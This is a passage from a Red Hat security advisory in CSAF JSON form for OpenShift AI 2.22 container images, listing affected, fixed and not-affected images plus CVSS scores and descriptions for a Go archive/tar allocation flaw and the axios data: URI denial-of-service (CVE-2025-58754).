"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/tar: Unbounded allocation when parsing GNU sparse map"
},
{
"cve": "CVE-2025-58754",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-09-12T02:00:53.897605+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2394735"
}
],
"notes": [
{
"category": "description",
"text": "Axios is a promise based HTTP client for the browser and Node.js. When Axios prior to versions 0.30.2 and 1.12.0 runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: \u0027stream\u0027`. Versions 0.30.2 and 1.12.0 contain a patch for the issue.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios DoS via lack of data size check",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Availability impact is limited to the application which bundles axios and not the host Red Hat system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
